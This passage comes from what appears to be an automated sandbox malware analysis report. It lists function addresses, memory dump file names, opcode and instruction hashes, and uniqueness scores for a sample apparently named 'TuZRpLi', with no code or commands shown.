                                              • Instruction ID: 79b075ad2fccbe2d2c1dbe82cd94124427267f1192d75e7d5331d671dd5f77b6
                                              • Opcode Fuzzy Hash: 2dd78523a6c72e69afb056c6e9798079e22ab36f91c79dc95cd58cae8a37d69a
                                              • Instruction Fuzzy Hash: 9FF01235900109DFCB09EFB8F954A9D77B5EF40708F504575C40897265EB316A098791
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 01056C14 Relevance: .0, Instructions: 12COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000011.00000002.3258005462.0000000001050000.00000040.00000800.00020000.00000000.sdmp, Offset: 01050000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_17_2_1050000_TuZRpLi.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 9db68c57dce2ecc4a7e7fd66cc82bcca7e0bd13905fa45a0d70d42defefe6578
                                              • Instruction ID: 577d8e6f295ec130be2fa0a806d62cb49673e815c9536a1a0c8a18381dbe6b07
                                              • Opcode Fuzzy Hash: 9db68c57dce2ecc4a7e7fd66cc82bcca7e0bd13905fa45a0d70d42defefe6578
                                              • Instruction Fuzzy Hash: 49C012363080908F8A02A728E0644B937B1DBCA16932402AAE188CB332CE22A802CB00
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Non-executed Functions

                                              Function 05F22019 Relevance: .0, Instructions: 6COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000011.00000002.3267493749.0000000005F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05F20000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_17_2_5f20000_TuZRpLi.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: baa15ce5661bc82c4e99c034622920e66cf50d7adfb8319281f7b1308692628f
                                              • Instruction ID: 894d026320fd682e304a506885a3de051b9bb4a0d217fc1291d7c0ca4f6e7829
                                              • Opcode Fuzzy Hash: baa15ce5661bc82c4e99c034622920e66cf50d7adfb8319281f7b1308692628f
                                              • Instruction Fuzzy Hash: C9B092B28503664FD3419D20A947B903764E300312F05002EA0118A866EB288206B904
                                              Uniqueness

                                              Uniqueness Score: -1.00%